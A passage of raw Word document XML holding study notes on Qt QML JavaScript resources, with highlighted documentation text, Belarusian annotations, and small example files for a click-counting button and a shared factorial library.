          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, its </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code will run in the same scope as the QML component instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>consequently can access and manipulate the objects and properties declared in that QML component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Otherwise, it will have its own unique scope</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and objects and properties of the QML component should be passed to the functions of the JavaScript file as parameters if they are required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782E40" w:rsidRPr="00D815C8" w:rsidRDefault="00782E40" w:rsidP="00782E40">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="24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 xml:space="preserve">An </w:t>
      </w:r>
      <w:r w:rsidRPr="008F15ED">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> of a code-behind implementation resource follows:</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// MyButton.qml</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QtQuick</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55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.0</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"my_button_impl.js"</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as</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Logic</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 a new instance of this JavaScript resource is loaded for each instance of Button.qml</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Rectangle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id: rect</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200</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100</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color: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"red"</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MouseArea</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id: mousearea</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anchors.fill: parent</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onClicked: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.onClicked(rect)</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// my_button_impl.js</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> clickCount = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</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 this state is separate for each instance of MyButton</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onClicked(button) {</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clickCount += </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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ((clickCount % </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">) == </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>) {</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button.color = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.rgba(</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w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>,</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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>else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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        button.color = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Qt</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.rgba(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>,</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w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>,</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782E40" w:rsidRPr="00D815C8" w:rsidRDefault="00782E40" w:rsidP="00782E40">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66105E" w:rsidRPr="00D815C8" w:rsidRDefault="00782E40" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t xml:space="preserve">Тлумачэнне дадзеных асаблівасцяў джава-скрыпт аб’ектаў </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F94A8B" w:rsidRPr="00D815C8" w:rsidRDefault="00F94A8B" w:rsidP="008F15ED">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc483000535"/>
      <w:bookmarkStart w:id="77" w:name="_Toc483603895"/>
      <w:bookmarkStart w:id="78" w:name="_Toc483605115"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Shared JavaScript Resources (Libraries)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="00A7196C"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Some JavaScript files </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>act more like libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - they provide a set of helper functions that take input and compute output, but never manipulate QML component instances directly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="00A7196C"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As it would be wasteful for each QML component instance to have a unique copy of these libraries, the JavaScript programmer can indicate a particular file is a shared library through the use of a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pragma</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as shown in the following example.</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55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// factorial.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7196C" w:rsidRPr="000D7D84"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262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D7D84">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="262626"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.pragma library</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var</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> factorialCount = </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>;</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factorial(a) {</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 = parseInt(a);</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 factorial recursion</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a &gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a * factorial(a - </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 shared state</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factorialCount += </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 recursion base-case.</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return</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factorialCallCount() {</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return</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> factorialCount;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A7196C" w:rsidRPr="00D815C8" w:rsidRDefault="00A7196C" w:rsidP="00A7196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66105E" w:rsidRPr="00D815C8" w:rsidRDefault="00A7196C" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
        <w:t>Прызначэнне механізма мне зразумела.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="006245E2"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The pragma declaration </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must appear before any JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> excluding comments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006245E2" w:rsidRPr="00D815C8" w:rsidRDefault="007D7B46" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
